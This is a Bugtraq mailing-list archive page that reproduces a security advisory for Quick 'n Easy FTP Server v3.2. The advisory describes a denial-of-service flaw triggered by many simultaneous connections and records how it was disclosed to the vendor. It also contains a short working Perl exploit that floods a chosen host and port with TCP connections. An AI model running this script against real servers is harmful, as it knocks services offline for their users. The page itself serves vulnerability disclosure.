Bugtraqmailing list archives

By Date

By Thread

[DCA-0007] Quick 'n Easy FTP Server v3.2

[DCA-0007][Software] - Quick 'n Easy FTP Server[Vendor Product Description] - Quick 'n Easy FTP Server Professional is a multi threaded FTPserver for Windows 98/NT/XP and Vista(32 bits) that can be easilysetup even by inexperienced users.New users can be easily created by a wizard which is guiding you stepby step in the process.The server handles all basic FTP commands plus a lot of special FTPcommands like MDTM, NLST, FEAT, PSWD, XCRC and many more![Bug Description] - Quick 'n Easy FTP Server can't handle multiple/simultaneousconnections leading to Denial-of-Service[History] - Advisory sent to vendor on 06/14/2010. - No response from vendor - Public advisory & exploit 08/02/2010.[Impact] - Low[Affected Version] - Quick 'n Easy FTP Server v3.2 - Prior versions may also be vulnerable[Code]#!/usr/bin/perluse IO::Socket;        if (@ARGV < 1) {                usage();        }        $ip     = $ARGV[0];        $port   = $ARGV[1];        $conn   = $ARGV[2];        $num    = 0;        print "[+] Sending request...\n";        while ( $num <= $conn ) {                system("echo -n .");                $s = IO::Socket::INET->new(Proto => "tcp", PeerAddr =>"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";        close($s);        $num++;        }        print "\n[+] Done!\n";sub usage() {        print "[-] Usage: <". $0 ."> <host> <port> <num-conn>\n";        print "[-] Example: ". $0 ." 127.0.0.1 21 1200\n";        exit;}[Credits]Rodrigo Escobar (ipax)Pentester/Researcher Security Team @ DcLabshttp://www.dclabs.com.br[Greetz]Crash and all Dclabs members.-- Rodrigo Escobar (ipax)Pentester/Researcher Security Team @ DcLabshttp://www.dclabs.com.br

By Date

By Thread

Current thread:

• [DCA-0007] Quick 'n Easy FTP Server v3.2Rodrigo Escobar (Aug 02)